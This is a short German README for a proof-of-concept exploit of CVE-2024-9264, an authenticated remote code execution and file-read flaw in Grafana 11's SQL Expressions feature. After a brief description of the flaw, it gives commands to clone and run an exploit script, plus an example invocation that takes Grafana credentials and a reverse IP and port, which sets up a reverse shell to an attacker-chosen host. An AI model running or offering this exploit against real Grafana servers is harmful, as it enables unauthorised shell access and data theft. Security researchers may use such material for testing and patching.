
Authentifizierte RCE in Grafana (v11.0) über SQL-Ausdrücke - PoC-Exploit
Authentifizierte RCE in Grafana (v11.0) über SQL Expressions – PoC-Exploit
CVE-2024-9264 - Grafana v11.0
Authentifizierte Remote Code Execution (RCE)
PoC
CVE-2024-9264 ist eine kritische Schwachstelle für Remote Code Execution und Local File Inclusion, die in Grafana 11s experimentellem Feature „SQL Expressions“ eingeführt wurde. Die API übergibt benutzerbereitgestelltes SQL ohne ausreichende Bereinigung direkt an die DuckDB-CLI, sodass jedes authentifizierte Konto mit Viewer- oder höheren Berechtigungen Shell-Befehle einschleusen oder beliebige Dateien lesen kann, sofern sich die DuckDB-Binärdatei im PATH des Servers befindet.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
Beispiel:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337